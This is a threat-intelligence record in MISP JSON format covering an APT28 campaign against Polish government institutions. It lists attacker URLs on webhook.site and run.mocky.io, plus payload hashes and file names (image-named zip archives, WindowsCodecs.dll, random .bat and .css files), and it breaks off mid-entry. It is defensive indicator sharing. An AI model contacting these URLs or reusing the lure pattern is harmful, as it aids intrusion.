{ "Event": { "analysis": "2", "date": "2024-05-08", "extends_uuid": "", "info": "OSINT - Kampania APT28 skierowana przeciwko polskim instytucjom rz\u0105dowym", "publish_timestamp": "1715185455", "published": true, "threat_level_id": "1", "timestamp": "1715185445", "uuid": "482a37ad-cfaf-41cc-9bef-b3829dde3b3f", "Orgc": { "name": "CIRCL", "uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f" }, "Tag": [ { "colour": "#4d24f9", "local": false, "name": "misp-galaxy:threat-actor=\"APT28\"", "relationship_type": "" }, { "colour": "#004646", "local": false, "name": "type:OSINT", "relationship_type": "" }, { "colour": "#0071c3", "local": false, "name": "osint:lifetime=\"perpetual\"", "relationship_type": "" }, { "colour": "#ffffff", "local": false, "name": "tlp:white", "relationship_type": "" }, { "colour": "#ffffff", "local": false, "name": "tlp:clear", "relationship_type": "" } ], "Attribute": [ { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184058", "to_ids": true, "type": "url", "uuid": "f0af1be5-d2c8-4ddf-9d57-9bf7dceed0ce", "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=2d07e34c-3dd3-45e8-865c-3888a65ab885" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "23970f3c-2986-4e12-b55f-c629dac5ebfb", "value": "https://webhook.site/2d07e34c-3dd3-45e8-865c-3888a65ab885" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "bfc758b1-8afb-47a9-a767-197d6dcc004a", "value": "https://webhook.site/4ba464d9-0675-4a7a-9966-8f84e93290ba" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "7a1ccc03-2df7-4910-8ab6-f40951ae3a54", "value": "https://webhook.site/577b82c3-7249-44e9-9353-5eab106fead6" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "d6c193c7-77b0-45a1-91a6-096533a7dedf", "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=127df518-52be-46c5-bbb2-0479f4b9693b" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "71e4b1ed-9eeb-44dd-89fa-4e60a176d6a3", "value": "https://webhook.site/127df518-52be-46c5-bbb2-0479f4b9693b" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "3a3b37ab-7c28-4180-b49e-3405fc48e21d", "value": "https://webhook.site/0ef0dcf7-f258-4d02-b274-cbf62a2000cf" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "1b098eb3-6e65-4775-91b2-6dfc35baf929", "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=c1112bb3-0e6e-4ba4-abe7-fb31388b47ad" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "43fab00f-72bb-451e-bb09-5ba843085dfb", "value": "https://webhook.site/c1112bb3-0e6e-4ba4-abe7-fb31388b47ad" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "cbce462f-feaf-41a6-90db-9e38b5adc9e2", "value": "https://webhook.site/3f396db1-2016-4b69-9ec3-ffc417d5f3aa" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "3c560a1e-1d26-45dd-af08-737305275867", "value": "https://webhook.site/66ea3bbc-29dc-4ece-b804-71c6ec7b77b6" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "a3bbc289-fcab-49d0-ab03-2a203aa44903", "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=efb79108-a2b5-4cba-844d-6352bb8fad8c" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "439aa2c4-c37b-415e-85c9-be0f8990e4b4", "value": "https://webhook.site/efb79108-a2b5-4cba-844d-6352bb8fad8c" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "5c79383a-0631-4f82-88e4-57120f9597b9", "value": "https://webhook.site/9c87649c-220d-425d-8331-ffc8d9b94a38" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "4a7fea0d-9558-41d9-b981-90bd88ba4d99", "value": "https://webhook.site/c618ea32-2923-4c12-8151-8d0002b56af0" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "d1ffe610-609e-40f6-87be-4a21d44b090f", "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=f97bcee0-0d91-4503-a30c-027f1b34820f" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "ba2aa92c-fc43-4b07-bc20-e0a42f2e4d71", "value": "https://webhook.site/f97bcee0-0d91-4503-a30c-027f1b34820f" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "69f76094-9840-4013-8575-3f3c382b1c0f", "value": "https://webhook.site/9a9cdaf8-120c-4de9-b17a-d6d8e2796a3b" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "ff8056f1-4392-4fd7-9b4f-13ab3ae6f68a", "value": "https://webhook.site/e13d23aa-b6f8-4491-9adc-71f7f8c438df" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "0d341018-48fd-4d78-a554-e607cc901dd4", "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=5e4c7949-30a2-4477-9e9b-e8828fc76a1b" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "036d34e6-c2d9-448f-8d53-a9311ddca779", "value": "https://webhook.site/5e4c7949-30a2-4477-9e9b-e8828fc76a1b" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "dbb31adf-72bb-440c-a697-b6854b432ed1", "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=5100fcc0-f6be-4b09-8c58-5a8a6706ec4f" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "301d5b93-11e9-4306-9862-7d49419c1ad0", "value": "https://webhook.site/5100fcc0-f6be-4b09-8c58-5a8a6706ec4f" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "d5d0c2fa-20ae-4f4b-ae30-c7eeb340b2af", "value": "https://webhook.site/7674f06b-e435-4470-a594-6d59578c552d" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "310fdbe5-523f-4b48-ba70-ce9f25c74876", "value": "https://webhook.site/dee016bf-21a2-45dd-86b4-6099747794c4" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "a8c11946-d787-437c-be15-bf8c454ce1b3", "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=508da0df-7ec9-420e-b1fe-958fbbe699d1" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "3f269f7c-2d0e-4a9f-acc7-6132f24ac8eb", "value": "https://webhook.site/508da0df-7ec9-420e-b1fe-958fbbe699d1" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "72ab91d7-e187-4932-b069-a489d120bb85", "value": "https://webhook.site/bec23763-b8d9-4191-99ba-04a4a163b4de" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "61100d52-cca2-4cdf-bf3f-ff8a133e01c4", "value": "https://webhook.site/90fea98f-fbdb-4847-be03-409d02a43caf" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "ddc055aa-b7fa-408f-b19d-678f015ffd46", "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=bc349b93-b047-42f8-a421-d45e3ec94dc5" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "9cc77420-c9c0-4b64-b96e-67ddacf80263", "value": "https://webhook.site/bc349b93-b047-42f8-a421-d45e3ec94dc5" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "164b007d-2dde-4362-acf5-204ab51e0cef", "value": "https://webhook.site/5a8758c6-5702-4fea-9d5e-4fbdb6dd795f" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "413e49e1-6430-41d7-a3b0-52aff962ead9", "value": "https://webhook.site/b10bd697-1a9f-4ec7-aa2f-1fa84ad916a1" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "0515787f-aa33-4099-9c69-fa76b3cf5ecd", "value": "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=1658772a-4de8-4368-a604-980c90b0a1ed" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "55bdfb1f-0650-4312-9f89-785d6dcc4eec", "value": "https://webhook.site/1658772a-4de8-4368-a604-980c90b0a1ed" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "529af1e0-a4c6-4d7f-8db9-e15c262130a4", "value": "https://webhook.site/4fe5885c-f2f6-4905-8bc7-aef1a046a134" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1715184059", "to_ids": true, "type": "url", "uuid": "b73b5534-0ebb-4516-a112-263e3f9e8b71", "value": "https://webhook.site/0d2dc90e-2d5e-49f8-8249-d7ab955c387a" } ], "Object": [ { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184102", "uuid": "8fc240e5-c496-4027-b9ce-2bf83632f084", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184102", "to_ids": true, "type": "sha256", "uuid": "0741808a-ba3a-484f-8766-d66491885933", "value": "2bd9591bea6b1f4128e4819e3888b45b193d5a2722672b839ad7ae120bf9af3d" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184102", "to_ids": true, "type": "filename", "uuid": "54cd6722-7b01-4619-9f80-9f23fc3825af", "value": "IMG-1030873974629655576.zip" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184148", "uuid": "e02fd994-a773-46cd-ad55-c1cc542c9861", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184148", "to_ids": true, "type": "sha256", "uuid": "169d9555-ad87-47e5-b02d-6210e48fb27e", "value": "52b8bfbd9ef8ecfd54e71c74a7131cb7b3cc61ea01bc6ce17cbe7aef14acc948" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184148", "to_ids": true, "type": "filename", "uuid": "ecf31c68-2c8d-4c35-8b96-65420d58f167", "value": "WindowsCodecs.dll" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184163", "uuid": "4b228653-3eef-4646-b8ff-76d6c1bfeb32", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184163", "to_ids": true, "type": "sha256", "uuid": "26e07573-f4e2-4022-99c1-a0ca8a3dc24d", "value": "4001498463dc8f8010ef1cc803b67ac434ff26d67d132933a187697aa2e88ef1" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184163", "to_ids": true, "type": "filename", "uuid": "01a70bf7-34d1-4170-ac50-2dfb483470f6", "value": "bcpcn.bat" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184180", "uuid": "a5bf9b3e-3b08-4e06-b2b4-585239b73b05", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184180", "to_ids": true, "type": "sha256", "uuid": "3ad0b72d-b65e-4366-a30d-9c90f817d014", "value": "158d49cce44968ddd028b1ef5ebc2a5183a31f05707f9dc699f0c47741be84db" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184180", "to_ids": true, "type": "filename", "uuid": "c2a415b4-cfde-4485-aae9-a88eb8d69e63", "value": "IMG-1030873974629655576.jpg" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184199", "uuid": "a29f2969-d1e9-4b3f-a96b-5c1a8348a7f3", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184199", "to_ids": true, "type": "sha256", "uuid": "7a7113b4-855f-47d5-a58b-8080feb8bc6f", "value": "939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184199", "to_ids": true, "type": "filename", "uuid": "34267455-e29c-4153-94b4-80b52f916ee9", "value": "kpqsklcrdsonoknaote.css" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184221", "uuid": "3766bd1a-2bef-493b-bd2e-a73a914e4b54", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184221", "to_ids": true, "type": "sha256", "uuid": "b14cfe48-745d-4137-9d68-3e4753d143b8", "value": "7c6689f591ce2ccd6713df62d5135820f94bdbf2e035ab70e6b3c6746865a898" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184221", "to_ids": true, "type": "filename", "uuid": "a3ba37c4-891f-481f-9843-659e80921c19", "value": "IMG-7214532.zip" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184251", "uuid": "82038fdd-a441-4c72-a1da-f101ded09359", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184251", "to_ids": true, "type": "sha256", "uuid": "0cd0dbc9-deef-4e8d-8e62-1448bdc4844e", "value": "c968f9dd1f16a435901d2b93a028a0ae2508e943c8f480935a529826deb3dbeb" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184251", "to_ids": true, "type": "filename", "uuid": "2fb0b2d0-4f17-40b9-86b9-652ef620b948", "value": "WindowsCodecs.dll" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184266", "uuid": "d58f687b-98d0-460f-a87d-2d45b7fbcaa9", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184266", "to_ids": true, "type": "sha256", "uuid": "bb323c3b-a23c-4d10-baa7-aaa7ef118fc2", "value": "34cabc0ff2f216830ffe217e8f8d0fa4b7d3a167576745aba48b7e62f546207b" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184266", "to_ids": true, "type": "filename", "uuid": "63f0b04b-6c3b-4ad6-8847-397740d00110", "value": "zdesdyf.bat" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184317", "uuid": "2a5ee9a3-916c-4992-ab21-033dd67b6833", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184317", "to_ids": true, "type": "sha256", "uuid": "a333f2a5-c897-42a6-8970-eeed952508f5", "value": "e1069c8677d64226f7881e8504ed7a13f79f43f143842ea6c1c8b2cc680ed6c2" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184317", "to_ids": true, "type": "filename", "uuid": "0d39321c-be79-4270-b06f-bf8394d33fb8", "value": "IMG-238279780.zip" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184342", "uuid": "d092b3d7-6adf-4a2e-973c-0e17a5c4d4cc", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184342", "to_ids": true, "type": "sha256", "uuid": "301ab892-2a9b-48be-aadf-649957ae48e5", "value": "43ff178e428373512b83f85db32f364fc19c9a4ac7317835bd5089915b8727b5" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184342", "to_ids": true, "type": "filename", "uuid": "816948af-2839-4252-83a0-d722778461e6", "value": "WindowsCodecs.dll" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184359", "uuid": "50ff16f1-a066-4a6c-8497-212e69bc2d18", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184359", "to_ids": true, "type": "sha256", "uuid": "f97b5658-140f-4ec8-a043-36ce0561fcb4", "value": "ca700d44db08ad2ebd52278a3b303f8c13e44847a507fb317ea5dfb6cc924a76" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184359", "to_ids": true, "type": "filename", "uuid": "c6cdfe8c-89e6-43d9-840b-ac582d6af343", "value": "hjpxswjdkayzwfphx.bat" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184382", "uuid": "aaf5a34f-eebc-41f2-8abd-b7286c0ba236", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184382", "to_ids": true, "type": "sha256", "uuid": "3207b31d-8352-4c3f-aaa4-83dcbc6b992b", "value": "bab7e81395e1e9ee1680c3bb702c44b1b13ee5e67fa893d765284ae168de8369" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184382", "to_ids": true, "type": "filename", "uuid": "fac94f78-1773-4961-bd6f-1bd02dbad953", "value": "IMG-238279780.jpg" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184413", "uuid": "759bb98f-4791-4ef8-bbee-c0ad4df19e01", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184413", "to_ids": true, "type": "sha256", "uuid": "f9206a63-af42-425d-bcf1-c855cc3f1484", "value": "939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184413", "to_ids": true, "type": "filename", "uuid": "a12e0672-06a7-404e-93a6-380faab66f53", "value": "vngradn.css" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184434", "uuid": "ef6ba0b7-6e5e-4df8-aee7-7c857a1f3f8b", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184434", "to_ids": true, "type": "sha256", "uuid": "114c1bf2-8cb0-45a3-9c88-f02224afdffd", "value": "38ae06833528db02cb3a315d96ad2a664b732b5620675028a8c5e059e820514f" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184434", "to_ids": true, "type": "filename", "uuid": "f0e61fc6-0ead-4fd8-af7c-7b9f527123d0", "value": "IMG-810629002957075004.zip" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184451", "uuid": "e03676a9-bcba-4136-a229-40ef123c6564", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184451", "to_ids": true, "type": "sha256", "uuid": "7c02261c-f54e-4c00-9d8b-a8595acb2688", "value": "ee433ddd5988ab7325b92378c6d3cb736ddb7f1bad75b939e8c931f417660129" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184451", "to_ids": true, "type": "filename", "uuid": "18652901-be76-47c5-b64d-61142bcd49c2", "value": "WindowsCodecs.dll" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184466", "uuid": "1e584f6d-896b-4b68-81c3-29f18dc32a5a", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184466", "to_ids": true, "type": "sha256", "uuid": "7f7a5075-3ae9-4a93-a70e-4fa9a7888f35", "value": "9ddf5561562a62961a6fcac1dc49633cb79f5d3c8cc9b95fd9f87e7be70d2d35" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184467", "to_ids": true, "type": "filename", "uuid": "3995c1c2-c48d-4759-a455-7fac69faccdd", "value": "yvrlqpkgngppjp.bat" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184480", "uuid": "4506ab04-f5a2-403f-8ca2-c043ed14869d", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184480", "to_ids": true, "type": "sha256", "uuid": "d039a351-0b3d-426b-8084-ccaf849d78ea", "value": "dfd1f3229f903887f2474f361a26273dc63a6221883e86c5eea2dec9521dc081" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184480", "to_ids": true, "type": "filename", "uuid": "d227dcb6-f7bd-4225-a3cd-6170d8f809e0", "value": "IMG-810629002957075004.jpg" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184501", "uuid": "3fef157a-3ec0-488f-b19e-c5c8a976b1f8", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184501", "to_ids": true, "type": "sha256", "uuid": "0f6e0526-1925-47d0-b467-91a9eb5be141", "value": "939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184501", "to_ids": true, "type": "filename", "uuid": "82fb3f80-980b-4b08-ad73-ed5ed057d93d", "value": "ovhupm.css" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184568", "uuid": "5f90086f-8e2b-43c3-879d-002820a9a6ee", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184568", "to_ids": true, "type": "sha256", "uuid": "c39048dc-f20d-4109-85e3-821416ea7729", "value": "949b0bd52a4ed47bc4a342e5a29bff2bcdb0169d2fbf0f052509b65229e19b6e" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184568", "to_ids": true, "type": "filename", "uuid": "02ff035c-5517-4430-acde-ac8ac7391bf6", "value": "IMG-368912.zip" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184613", "uuid": "3283e384-fb80-405a-bac8-93d414a7f13d", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184613", "to_ids": true, "type": "sha256", "uuid": "49ada1e4-4e8a-450c-bec2-380e2e436866", "value": "642315d3091a3dfba6c0ed06f119fc40d21f3d84574b53e045baf8910e1fb38c" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184613", "to_ids": true, "type": "filename", "uuid": "cf413d16-f036-4ae6-b42d-ef71d6a8d2a7", "value": "WindowsCodecs.dll" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184633", "uuid": "ac3a0e68-fa29-443c-81b6-46f75050691d", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184633", "to_ids": true, "type": "sha256", "uuid": "3ba3f39e-2239-4583-a192-afcb536dd3f1", "value": "fb42a4e0f2dd293fd6e7acb8d67d67698a0ae7685bc5462685acf4c2f73d0b44" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184633", "to_ids": true, "type": "filename", "uuid": "140c69ef-cb66-4ceb-9e15-1e0f9cafbd49", "value": "udkozfnsljmbpjs.bat" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184646", "uuid": "9d3bab3c-cc97-483a-8589-197fe2b4748b", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184646", "to_ids": true, "type": "sha256", "uuid": "48a7c119-bbe1-4d45-8a64-60936e097e46", "value": "07e539373177801e3fc5427bf691c0315a23b527d39e756daad6a9fc48e846bc" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184647", "to_ids": true, "type": "filename", "uuid": "58e0868b-14a8-4ba1-9c1a-215ac75661e5", "value": "IMG-368912.jpg" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with 